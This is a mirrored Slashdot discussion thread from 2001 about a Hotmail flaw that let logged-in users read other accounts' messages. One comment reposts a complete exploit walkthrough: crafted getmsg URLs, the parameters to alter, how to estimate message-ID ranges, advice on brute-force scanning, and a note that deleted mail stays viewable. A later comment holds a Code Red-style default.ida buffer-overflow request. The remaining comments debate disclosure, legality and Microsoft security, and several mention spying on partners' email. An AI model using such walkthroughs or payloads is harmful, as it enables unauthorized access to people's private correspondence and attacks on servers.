Slashdot Mirror
Hotmail Hacked
SyD writes " Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail. A hacking group known as root core discovered the hole and reported it to Microsoft. " This isn't the first time that the folks who are gonna give us a internet wide universal login system had a hole. The funny part is that I posted a story almost exactly like this like 2 years ago, and about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out". No I'm not kidding. You can't make that stuff up.
Isn't this *after* they started moving a lot of servers to windoze from FreeBSD
:)
Yes, probably flame bait...it's in the hostmail system...so no blame on the OS
Chaos, Mayhem, and Destruction: Not
Now someone ELSE will have to read all my spam too, oh darn. They'd better fix that quick.
Things you think are in the Constitution, but are not.
Score: -1, Redundant
"He was a wise man who invented beer." -- Plato
c'mon this isn't news this is just a reality of MS and the everyday world.
Ohh and don't blame the OS blame the programmers
---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---
_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
d ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com
:)
d ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om
d ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com
.....]---
:)
(Tested with Internet Explorer 5)
To view full email from some elses account do the following:
1. Login normally to Hotmail with your ID (any id)
2. Use this type of link to view specific message from specific user:
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/safer
From that link change values:
MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
username (Hotmail account name to view)
MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149
(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)
Note.You need to have both numbers correct
and that username must have the message to make this link work.
Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
See here for full list: http://www.december.com/html/spec/ascii.html
3. Done. If you entered correct message number & that user has it you will see it.
(Test it with your own other hotmail account messages first to get the idea working.)
---=[ ideas and comments for improved viewing / scan ]=---
Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)
It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:
MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.
So you dont need to scan as many message addresses
when you know from which range you are looking at.
Test messages: (Login to hotmail,then use links to view message from my test account)
raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/safer
email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/safer
*Side note on deleting messages in Hotmail:
-You can also see the message even if its deleted!
If you delete a message in hotmail, and
also empty trashcan, the message is still
viewable using this type of link.
Atleast for 6-12hrs or something.
---=[.... Status / Feedback / Fixes / Questions
Changes on the link:
Remove parameter:
%26disk%3d64%2e4%2e36%2e68_d1577
It caused Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. its not required.
Changed parameters:
%26start%3d9702%26len%3d9687
in to:
%26start%3d1%26len%3d9999999999999999
Thats is just the start & length to display, of the email.
If you put too small value for len it should display
only up to that amount of characters(?).
*
If the user doesnt have the message you will get error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."
*
Questions:
Q1. How do i get to know which message number the user has?
A1. You cannot. You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of
messages just to see something. (slow it is)
Q2. I've sended a test message to my another account but cannot see it?
And i can still see your test messages, but not my own?
A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (i havent seen bigger than 150)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try change the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail"
If you can see the test account messages then hotmail hasnt been fixed yet.
Q3. The hobo scanner program doesnt work?
I get some "Path not found (76)" error?
A3. True in most cases..
It has more bugs than microsoft products i guess.
Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
On Winnt it works but it doesnt save the scans..(bug in activating the webwindow..)
Create the output directory yourself, that fixes the path error.
Q4. Where/How can i find this exploit link myself?
A4. 1. Go to your hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press ok to save settings.
5. View some email, you will see full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens new window with this exploitable link,
you can remove the some useless parameters from the
link and send this link to a friend for testing
if can see your message.
*
No any reply or confirmation from Hotmail so far.
The exploit still works. already almost 3 days since
reported it to Hotmail..(today is 20.08.2001)
Automated reply from hotmail security problem
submission page did gave this type of message..:p
"...Hotmail is a secure site and uses an intrusion alert that allows only one IP
address to gain access to a mailbox at a time. If anyone tries to access your
e-mail when your account is open, he or she is returned to the sign-in page.
Hotmail uses state-of-the-art software and firewall protection to offer our
members the highest security...."
I could open internal links on a dead site using google's cache. What is that field next to the URL anyway?
Black holes are where the Matrix raised SIGFPE
"The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.
I suppose the quux is whether I'm an "average person" or not. I think I'll go stand in the street to hedge my bets.
I/O Error G-17: Aborting Installation
*whew* Good thing I still have all those y2k
supplies.
"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."
Bring me these experts. If someone thinks my hotmail account(s) leave a clear trail to me, they're insane. They leave a clear trail to my web proxy, perhaps. Most of my accounts only ever receive one email too... "Slashdot password for user Vladinat0r"
Sigh. Experts indeed!
here
--
Error 500: Internal sig error
(Yeah I got that one rejected when I submitted it
it's in my head
You need to guess the message ID, a longish string based on a timestamp and another number. And once you do that, you still can't read other messages from that account unless you guess them separately. You could try brute-forcing the message IDs, of course, but then you're relying on a fast connection (I believe there are 60 possible message IDs per second, and you rarely know exactly when a message was processed anyway) and fast servers. Besides, after all this, you'll probably find that all the target account's real mail was automatically deleted to make room for WinXP.iso.bat, attached to a message asking for advice.
Gates' Law: Every 18 months, the speed of software halves.
Here is the release from rootcore, and here is their exploit. Since the post is low on technical details, here goes. It's pretty simple. Messages are specified by a number. This program guesses the number.
It isn't Passport which is flawed but the system of Hotmail itself. This is merely an exploitation of bad data structure that is independent from Passport. That said, if you care about the security of your private communications, don't use Hotmail. Duh?
Pax Digitalia
Guess they haven't gotten rid of Code Red yet!
(For the humor impaired: no, I did not actually do the telnet session.)
Use 'slashdot stuff' in the subject line in any email you send me if you want to get past the spam filter.
Now anyone can get in and read all the porn ads I get in my hotmail inbox.
The Internet is generally stupid
So another bug found, my question is, why is the whole world afraid of hackers and crackers (don't even bother to argue the difference) I think that they shouldn't be afraid of the ones telling the bugs but the ones that makes them... See no evil, hear no evil, talk no evil....
I'm glad for Onebox and my regular email accounts.
Sure, some would say, "It's free; shut up!" But: MS is __still__ claiming to provide a service even though there is no direct cost to me. That there's no cost doesn't mean I don't expect the service to be useable. My recourse is to leave. Is that what MS wants?
Oh, as an aside, I hope the message #292192399 bug is never fixed - "Imagine if there's no First Posts...It's easy if you try..."
-- @rjamestaylor on Ello
A monopoly is a scary thing.
Despite the fact that MS beleives very firmly in a security through obscurity model of business, they have both benevolent and malcious hackers and crackers world wide working to expose as many of their security holes as possible, thereby forcing MS to patch those holes. Code Red would still be unpatched if eEye hadn't released it's exploit POC. This exploit would still be out in the open and freely abuseable if it hadn't been released.
Since MS is the 'standard' for most internet users, it's also the recipient of all the world's security unsolicited security advice.
The next Slashdot story will be ready soon, but subscribers can beat the rush and slashdot the links early!
Not a single security flaw yet discovered that allows unauthorized email access, and it's been running for 4+ years.
And Yahoo! Messenger kicks AIM's and MSN Messenger's asses.
Why tempt fate?
Send your friends messages of love at fuck-you.org
For script kiddies who don't want to be bothered with the detailes, there's even a Windows program that automates the process.
Ah yes, that clear trail to a dead end makes me feel much more secure...
The previous case from 2 years ago Taco speaks of can be found here
The One Rule Of Chess You'll Ever Need: Don't play someone who carries a kit in their bookbag.
blah blah, we expect this from MS... blah blah, when will they get their act together...
This was already posted to BugTraq not too long ago. For a more technical breakdown of the details surrounding the Hotmail vulnerability, go here:
http://www.securityfocus.com/archive/1/205785
- tre
http://piclabs.com
* Will someone please think of the children! *
Please email all complaints to root@127.0.0.1 and the issue will be dealt with in due time.
"However," Microsoft said, "we recognize the concerns raised in the computational infeasibility of this mechanism and are investigating ways that we can raise this bar even higher."
Like Taco said...you just can't make this stuff up. That response is just too funny.
The more parts of a program you have refferencing any single variable in programming C/C++, the more chance for a margin of error you have
Security works the same way. The more places you use a key, or the more people you give a copy of your key to, the higher risk you have for errors, being hacked, identiy theft, being robbed, etc. A 'single sign-on' like the MSN/Hotmail passport or AOL's new Single-Signon or Screenname (not sure what they are calling it) that all AIM accounts/AOL accounts now have become are just another invitation of risk.
Users need to be alerted of this fact, that these systems may not be secure, and users need to understand that the more people who they use their single sign-on for, the higher the risk becomes.
In this situation though, you have to wonder. If the person issuing the 'keys', microsoft in this case, does not do a good job of protecting them and making sure that their security is up to date, can it be any better than if you had a safe deposit box that sat unlocked in the middle of Times Square?
I can't wait to see what happens when in addition to all these Single Sign-on and Passport type programs, that we have Digital Signatures too. That should be interesting.
[Something witty and intelligent should have appeared here.]
{Traicovn}
Finding a valid message number is of course total guesswork, but they do all follow a consistent format and always have the same number of digits (i.e., a time stamp), so with the help of a little brute-force program one could (if one was into these things) try numerous combinations in the background rather than type them in.
So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.
Theres a little story about it on the msn.co.uk website
it's in the Hall of Fame!
...did s/he?
Somewhere in the heavens... they are waiting.
I think microsoft makes the holes themselves, does any other "large" organization have this much trouble? I am willing to bet you can't get into Bill Gate's house without some sort of "rent-a-cop" cause there may be a security hole there too...
Now I can finally write a LISP program to pick up my hotmail...I'm never leaving Emacs again!
Carousel is a lie!
I'm glad I stopped using them years ago, when M$ took over. I kinda new that their service was going down.
Lets see, they were hacked once, then the red worm did a little damage, now they are hacked again... hmm can't wait for .net, so that everyone can read my design documents. hmm do you think they 'll have local or remote storage with .net???
It's to bad that they are such a hackers target and they do little in the way of security. I wonder how strong the M$ firewall will be in XP..
I know it may seem a bit trollish, and would be suprised if someone did not ask quesitons, but then again there are those that follow blindly.. Are you a sheep or a wolf?
Only 'flamers' flame!
spawn_of_yog_sothoth
Im so glad they found this flaw (one which from the reading isnt all that new) as now we know that our hotmail can be read by anyone - how ? well the kind hearted uber skilled hackers didn't just post this to MS did they ? naaah they posted ot everywhere - its the talk of IRC etc etc.
Im so glad hackers keep 'finding' things, like credit card numbers, ways into banking systems, viruses like code red - makes me feel warm and fuzzy.
My question - not to be a troll - is this (and this does not just relate to MS products but im asking a serious question)
if this security flaw had not been found (by these guys looking for a way to break into hotmail to read peoples mail) would anyone have been affected ? i mean if the flaw had to be looked for with carefull thought etc then was it a real serious issue BEFORE these guys told everyone ?
networks can have flaws and holes, open ports etc left active by a careless admin - not the best i know but big systems have a lot of work and these days we are coping with less staff (i know my company is) so sometimes things slip through.
But these guys go and look for the exploit (i mean what other reason would you have to search for this exploit BUT to be able to hack in and read mail? and then why tell everyone?
These things need to be fixed i agree but if no one wold know they were there expect for some kindly souls seeking them out then how much of an issue are they ? Are we just accepting that hackers are a good thing cause they find these problems ? what will you think when they 'fin' that flaw in the company which has your credit card number ?
I refuse to argue with Anonymous Cowards - if you want a discussion get an account....
I was all set to flame about this story being a year old. Oops. It's a different one. Sorry. My bad.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
I use to love crackers! They are a great little snack in between meals: good with cheese or jam, and not too filling.
And now they betray me, reading my personal email? Damn them!
Hackers on the other hand, I keep an eye on. Some can be good, and some can be bad (or both).
Why does the media try to convince people that a "fast internet connection" is a limiting factor? It seems to me that many of the people who are script kiddies, or l33 d00z, or whatever, are people have some form of broadband. That's like saying "well cars are only dangerous if you drive a Porsche."
Someone gets to read my spam. Maybe they will have better luck making their dick 4 inches longer than I did.
"Go into the hall of mirrors and have a bloody hard look at yourself" - HG Nelson
With Passport, a single sign on can access all your credit cards, bank accounts, medical history, and other pertinent data! And who better than Microsoft to trust all your personal data to? You'll never again have to worry about who has your personal information because you have the power of Microsoft to secure it and manage it for you.
No, Thursday's out. How about never - is never good for you?
bah, it works... but you have to scan millions of numbers to get one message... very efficent, i must say.
Runnin' On Empty
I will probably take a huge beating for saying this, but here it is. Although Microsoft has a long way to go in dealing with security issues, they are lightyears ahead of where they were only a few months ago. New tools to scan all the servers in the domain for patch levels of various vulnerabilities, fairly quick response time to notifications of vulnerabilities and no more "that's only a theoretical vulnerability" attitude.
I am subscribed to their security notifications and there is an honest effort on their part to fix the problems. More shocking is the recognition they are giving to groups that expose these vulnerabilities - a 180 turn around how they used to desparage those who uncovered such problems.
Sig under construction since 1998.
I don't mean to be a stick in the mud but this information clearly lays out how to hack into a privately owned computer system. This is illegal in most countries and as such whilst Slashdot don't censor their posters (free speech is something i'm all for) allowing this to be moderated up shows the sort of people that this site is being controlled by - and a smart lawyer could argue that the promotion of this item constitues the marketing and or distribution of this illegal material thus making slashdot and its owners accesories after the fact to a crime (yes hacking is a criminal offence with jail terms)
Just a point - now if you guys have a brain you will mod this back down or remove it - i think its an interstin post but i would encourage the users NOT to post full exploits but a link to a page (use geotcities or someone similar) off site - as you cannot be held responsible for it (pretty disclaimers aside you are legally responsible for the content here - its just that no one has decided to pursue it yet)
YES I AM A LAWYER
Thanks to Hotmail there are going to be a number of people out there now using my name to get valuable college degrees over the `net.
Hopefully they'll be good sports and also get me a lower interest rate on my home.
- You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of
messages just to see something. (slow it is)
Don't get me wrong, I'm all for Microsoft bashing, but I wouldn't call this a "major security hole". It's a hole alright, but major? Not by my standards.One day, people will STOP TRUSTING MICROSOFT WITH ANYTHING!$$@#@
I'm sorry...but, when MS isnt selling all your info to someone, they let the hackers have it...
has MS sued the finders of this backdoor yet?
The opinions in this post are ficticious. Any similarity to actual opinions, real or imagined, is purely coincidental.
And let's not forget...I send you this e-mail in order to have your advice. I have a hard enough time reading my e-mail. Good luck to all the crackers out there who want to read my e-mail. I even got spammed the other day by someone selling orthopedic in-soles for people with a "leg lenght discrepancy" now that is something I'm looking forward to more in the future, Niche Spam.
how is simple information illegal? i can go to the library and purchase a book on how to do something illegal, does that mean they shouldnt be allowed to have those type of books? no... and if i checkout a book on how to blow up a building and end up doing it, the library isnt responsible for my action, is it? no...
. . the more you amend it, the more holes you create.
"..don't you eat that yellow snow."
Surely these evil people should be sued by Microsoft under the lovely DMCA for being so smart? I'm just glad Microsoft don't run anything important like government sites... oh, um, yes, the uk government.
-tfga
This comment does not represent the views or opinions of the user.
Also does anyone know if Microsoft switched scripting engines with the move to W2K? If they kept the old engine, something tells me it wasn't Chili!ASP...
-twb
This is how Miss Cleo knows all the answers!
There are 0x40000000 types of people: those who understand 32-bit IEEE 754 floating point, and those who don't.
Notice that the new system generate even more crap than the old system? Now not only people want to have first post, but they'll also go for the post with lots of zeros after it. Good job Slashdot crew, you've just started a new trend,
"Zero Posting", the rules are simple, the most 0s you have, the most l33t you are. I even envision a new trend "Prime Posting", where you look for prime numbers in you comment id. Anyway, your site is doomed.
Je t'aime Stéphanie
since when did libraries start selling books instead of lending them (aside from the occasional used book sale)? Oh, that's right. Public libraries, the napsters of the 18th century, had been "sharing" copyrighted material, until the Pay-per-view Copyright Act outlawed all forms of "sharing" of copyrighted material.
A singular achievement indeed, apparently being chased by several folks here.
As a ranking member of the FP community, however, I am saddened by the new numbering system. It appears that many will move on to contests involving milestone comment numbers (such as you have accomplished with comment, um, "2200000"), but somehow it doesn't quite have the feel of first posting. Less like racing, more like Lotto.
However, I do not wish my comments to detract from your win, as I wish to offer you congratulations of the type once shared between all the great FPers back in its heyday. WTG, and, emphatically, w00t.
props to all dead homiez
I would never use hotmail in a regular basis. I only have an account in order to use MSN messenger (I use Everybuddy, not the damn MS client), because there are people i can't convince to use something better. Yet, I'd qualify hotmail as unusable; it's slow, bloated, ugly, gets in your way with so many damned little messages (it's so microsoft), and to top it off, the account receives an average of 50 spams a day. And NOBODY has that address. The only explanation: those mofos sell their addresses to spammers.
how is simple information illegal
I dunno.. but it is. I keep asking myself the same question.
"A mind is a terrible thing to taste."
and jail them for life where they will be raped, beaten, stabbed, and hopefully killed. obey the DMCA or die!!!!
What you seem to be saying is that if the people hadn't reported it / found it, there would be no problem. This seems to imply you think they are the only ones capable of finding this particular hole.
So if I see a dangerous condition -- say, a truck moving down the highway with a flat tire falling to pieces, or a leaking gasoline tank, or a fallen power line, or a boat coming unmoored, or a building with loose masonry, or a bad pothole, any number of things -- if I see any of these, rather than warn the public of the danger, better I should leave a note for the owner, who may be off on vacation and won't respond for several weeks? Am I supposed to be so worried that some lunatic might throw a match into the leaking gasoline that I say nothing at all?
I think you need to bury your head in the sand a bit deeper, instead of surfacing now and then to say such silly things.
Infuriate left and right
I hope they leave the bug in place, and have the message counter go down instead of up! That would really mean First Posts were inaccurate, though it would set a cap on discussions...
"There is more worth loving than we have strength to love." - Brian Jay Stanley
1. Log into hotmail normally.
2. Type in this link:
http://pv2fd.pav2.hotmail.msn.com/default.ida?XX XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
X XX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858
8 %u cbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685
1b%u53ff%u0078%u0000%u00=a HTTP/1.0
Yes, perhaps one unfortunate day it will be illegal to explain security vulnerabilities in depth, but until then there's little wrong in supporting open disclosure. Security through obscurity doesn't work.
Accessories to a crime by having this post on Slashdot? Yep, you Must be a lawyer if you can come up with and rationalize arguments like that.
All of us could probably go to jail for reading this....
I'm surprised that 1) root core didn't keep themselves anonymous and 2) gol64738 didn't either.
After that ISP security hole lawsuit, I certainly would've...
It's encrypted (with end-to-end encryption between HushMail users -- email sent to non-Hush accounts are only sent to Hush's servers unencryped), it's more secure. I'm not a Hush representative, but after using it for a few months, it's definitely the answer. (The question being, what's the best free email service?)
J
It's amazing that I've never heard of a hole in Yahoo's webmail.
Lets see, 52 weeks in a year, two years...
You're telling me that at least 104 slashdoters have girlfriends! Get out!
"(pretty disclaimers aside you are legally responsible for the content here - its just that no one has decided to pursue it yet)"
This suit is the closest I've managed to dig up so far, but between Communications Privacy Decency Act (or somesuch) and DMCA, along with a prevailing broad interpretation of "service provider", most message boards such as AOL, etc., have been found to have no liability for what goes on. If that weren't the case, ezboards would've been toast a long time ago, and AOL would be fighting dozens of lawsuits a month. Do you have any examples of case law to back up your statement?
oh, well then i have three words for you:
1. neener
2. neener
3. and, uh, um..oh yeah, neener.
I know that /. will probably get a nasty email asking them to remove this post, but I just feel the need to post this bit of information:
NOTE: By following these directions you will be breaking the law.
while (in_car(use *right_foot))\
push(($pedal) to go [@REALLY_FAST]);
I have had this information in my head for years, but felt it was time to inform the rest of you how to do it. Now I know I will be pursued by lawyers attempting to utilize the DMCA against me for revealing this information that the vehicle manufacturers did not want you to know... such is the life of a hacker...
Well, where are all the people who always point out that Hotmail runs BSD? It's a unix problem bla bla bla
I don't know about the rest of you, but I know all my girlfriends passwords and accounts, and she knows all of mine. It just makes it easier, since we use a lot of the same accounts and systems.
... Nope. I doubt she checks mine either. We trust each other.
Yes, that means that if I wanted to, I could check any of her email accounts. Do I?
If you are in a point in a relationship where you feel the need to spy on your signifigant other, then it's probably a sign of deeper problems.
AOL: You've got mail!
Hotmail: You've got someone else's mail!
But then, MS keeps messing with things.
maybe that's what they are doing. Not so much fixing bugs, but practicing security by randoming shifting the bugs around.
Sorta like Whack-a Mole
;-)
- - -
Radio Free Nation
is a news site based on Slash Code
"If You have a Story, We have a Soap Box"
- - -
"It is a greater offense to steal men's labor, than their clothes"
How about the part of thelaw that says that parody, satire and caricature is free speech. Clearly the layout of this exploit is a satire along the lines of: How A Three Year Old Can Break Into Fort Knox And Get Away With Half A Trillion Dollars Without Even Trying Very Hard.
We await your lawyerly opinion.
You may be a lawyer, but it appears you are wrong about the link part. 2600 and many others were taken to court and lost, by posting links to DeCSS code, something that is quite outrageous, but it flew in court.
-- Another senseless waste of fine bytes.
You know the kind of letters people write:
"Dear Somebody-you-never-heard-of,
How are you? I am fine. Blah-blah-blah, blah-blah, blah-blah.
Yours Truly,
Some Bozo."
Big deal.
--Homer Simpson
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
I've authenticated with a username and password, yet the username is also being passed in the GET string? And no check is being done to compare the username in the GET string is the same as the username associated with my session ID? Why is doing that simple comparison so hard? It would certainly "raise the bar" even higher on the "infeasible computational" chances of this happening.
This is similar to the Ameritech ebill security hole: no checking of user authentication - just GET any billing information with a *SEQUENTIAL* session ID in the GET string.
If this is an example of the authentication they've planned for Hailstorm services, I think many more people may have second thoughts about quick adoption.
creation science book
You don't need to be a hacker to read your girl/boyfriends hotmail email. 99% of the time you can guess the answer of the secret question and get access to the account. I have seen people doing it all the time.
Ok first they make the goverment mad. Then they start hurting all the MCSE and MCTs buy useing us as marketing tools and charging us more for the same benifits that used to be free. Then the schools and now they can not keep hotmail up. Next thing you know they will try to make us pay way to much for there software ........ ohhh wait that happened.
yes hacking is a criminal offence with jail terms
in fact, it is not a criminal offence.
I have legally hacked many systems. Now it may be a law to enter a system without permission, but thats not the same thing. There's also the arguement that a hotmail user does have a legal right to be on that system, so what it come down to is this "is it criminal to break a contract with a private company?" no, but you may be liable on a civil 'level'.
The Kruger Dunning explains most post on
But to me, the most astounding betrayal of computer security ever was Microsoft's conduct during the last Hotmail breach. Not that it happened (could happen to anyone) or even that they didn't pull the plug days until days after the exploit was made public but that they kept going for hours after everyone had the URL for the backdoor.
There was a great Salon article by a woman who heard about the breach on CNN, found the URL here and read her ex's new girlfriend's mail. I love the conclusion:
Late Monday, Microsoft continued to downplay the Hotmail hack in a statement published by Reuters: "We're hoping that because we jumped on it so quickly no one was affected."
Fat chance.
I wonder if this time will be different...
"Cars are only dangerous if they can move."
-----
"A man is judged by his every word." -RW Emerson
"They misunderestimated me." -GW Bush
Is it really 'hacking'? Hacking may be broadly defined, but it USUALLY implies willfully circumventing security measures. If Microsoft is NOT verifying any information in the GET string (comparing USERNAME against my session IDs username), I'd argue back they aren't implementing security - certainly not REASONABLE security.
creation science book
The problem with Microsoft is that they simply can't stop adding features to their products. They desperately wants to enhance the "usability" and nice look of things. This works extremely well for luring new unenlightened sheep to use their products. But it is of course at the cost of lower security, since it is simply impossible to check everything when so much new stuff goes in...
Until Microsofts learn that "good looks" and having feature X isn't everything I guess we have to live with their unsecure products...
Also, the 2600 case is not over yet.
Actually it's very easy, as long as you obey one simple rule:
Start soft...
No, your not a lawyer, your an anonymous coward!
Oops - lot's of my friends do actually...
Hmm....
Nah, (dismisses it with a wave of his hand), I'm too nice...
hmm...
I hope nobody views my very private "Cum Sluts 4 you, you Studly Horny Horndog" email from Jennifer397@hjklf.brf34.fgh3r
Somethings are just, you know, "personal"
:)
"security experts say Hotmail's 110 million users shouldn't worry too much."
Maybe that's because there are only 20 million hotmail users with many aliases. Who are they kidding? The reason why there are so many people with multiple usernames is because after a few weeks you will bombarded with "Hardcore Grandma F*cking" emails, and you must move on to a different address. Seriously though, I signed up Hotmail accounts twice, never used them, and they were getting 10+ spam messages after several weeks.
1 53nd y0u th15 m41l 1n 0rd3r t0 0wn y0ur h0m41il
:-)
4cc0unt!
(I just could'n resist
Make It Secret . Free JavaScript implementation of AES for your browser
His girlfriend knows all his information, like zip code and location, so she clicks on forgot my password. Having passed that, his security question was: "What's my sister's name?" That wasn't too hard.
Needless to say, once she got in and had a look at his e lover's correspondence, the four year relationship ended quickly.
** http://www.nkhumanrights.or.kr/ ** Human rights in North Korea. 1 million estimated dead from starvation.
Since the messageid requires guessing, wouldn't it be easier to guess the password of the targeted user directly?
¦ ©® ±
If Hotmail and passport sites are constantly hacked/cracked, people will have less and less trust in Microsoft.
:).
And besides, I don't have anything but spam in my mailbox
Scary. I have a hotmail account, and I have more of my personal messages sent there. I guess it just shows you how you can't trust any security no matter how good it may look on the surface.
-Aqua Seafoam- "In the academy we sat, learned like fools, we read predictability as if were wisdom" - CRASS -
YES I AM A LAWYER
Any smart lawyer would know a lot better than to provide unsolicited opinions on legal matters in a public forum. (Yes, it is possible to trace Anonymous Cowards through their IPs, etc). Now go back to your cave, troll.
Mmmm.. Donuts
"This suit [findlaw.com]"
Hot damn! Cool new feature. I guess to fend off any of the goatse trolling and whatnot. Sweet.
Photos of your mom
Kinda opens up a new level of humor...
My life is dedicated hosting
so if you broke into Fort Knox, you were only doing your bit, trying to help expose the vulnerability to help them. yeah.
you are one stupid dumbass, mr
Damn. They've got access to a whole bunch of spam... Luckily enough they'll be able to get a few credit cards (through another of the junk emails) to get into the site.
A smart lawyer, of which I could be one, would quickly dispatch the "promoting a felony" argument by pointing out that none of the promoting was done by the hypothetical defendants in this matter. Any promoting or highlighting of the "offensive" subject matter, like the posting itself as a matter of fact, was done by pseudo-anonymous members of the community at large.
It could be argued, I suppose, that Slashdot.org has created a forum that fosters or even encourages(?) such offenses, but that argument has fallen flat in a number of cases already decided.
Precedent being what it is I don't think Taco and friends should be speed-dialing Johnnie Cochran just yet.
-Coach-
Speaking of pretty disclaimers...I am not your lawyer and this is not legal advice, merely my educated opinion. If you wish legal advice seek out an attorney licensed to practice the kind of law you need in your area and pay them for it.
Perhaps the world's greatest tragedy is that ignorance is not impotence.
it's known as being a "common carrier". That is, an information relayer who cannot or should not have to monitor content.
Telecoms companies and postal services are considered such. *Some* online services are too. Contradictory rulings have been issued time and time again, so there's no final word on it (though anyone in their right mind knows that AOL can't monitor packets to check for DeCSS for instance...)
If you'd ever cracked IIS on NT you'd know any reasonable skript kid uses the same, five (six?) year old ring-0 exploit as 'getadmin' to get around this limitation.
Let's dissect this one, shall we?
"intruders would first need to log in to their own Hotmail accounts" right, no cracker would be bright enough to create a new one just for this purpose, duh...
"which means they'd leave a clear trail for investigators to follow" Yup, they'd follow it all the way to a public library.
Otherwise, entertaining piece.
Dear Slashdot: next time you want to mess with the site, add a rich-text editor for comments.
hehe where has the slashdotian lexical revisionist spirit gone? no one has complained that the title didn't read "cracked" ?? hehe :)
Look, so some free email site got hacked. Big deal. It isn't like this is some huge central database with all of the private financial and personal information for everyone on the internet. And I know whoever's running this "hotmail" site isn't stupid enough to try to set up such a database since it would be such a massive target for crackers and screw over so many customer, so what's the big deal?
Best. Comment. Ever. Enjoy!
Yeah, but we'll never know... On the US Treasury homepage, it says that money says money is "Legal Tender for all debts, public and private"...
Then it goes on to say that Federal law does not say that somebody must accept cash for a debt... However, if you look in any dictionary, "Legal Tender", is defined as something that must be accepted when offered. So, then doesn't that blow a hole in the US Treasury's idea, of what it thinks is law? If so, then great..... Now I can make merchants accept cash, instead of "requiring a credit card"....
Actually this ruling does not apply to slashdot (it hasnt been tested) the ruling covers communications carriers who cannot be held responsible for the information carried on their medium - be it phone etc - AOL is an ISP and as such fall under this defenition - this ruling protects ISP's from being held responsible for the actions of their users - its a valid and important point - Slashdot can claim protection under this status but it would have to be proven in a court of law - the proscution would attempt to prove that slashdot knowingly allows the information on this and other examples to be posted (disclaimer aside) and this forum is often host to people who advocate hacking and mail bombming and DOS etc as action against companies and individuals - the user posted this under a username as ws his right - but /. cannot claim he is an anymous user and unable to be blocked etc.
/. as a common carrier.
note im not commenting on the right or wrong of it - i agree the post may be foolish but thats not my opinion to state - i just disagree with the statement that this ruling covers
I refuse to argue with Anonymous Cowards - if you want a discussion get an account....
Gotta love the "experts" that TechTV talks to... From the article: In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.
Uh, yeah, more like "intruders would first need to log in to a new, free, anonymous Hotmail account". Not much of a deterrent!
That's how I knew my last relationship was over: when she changed her password to her e-mail account.
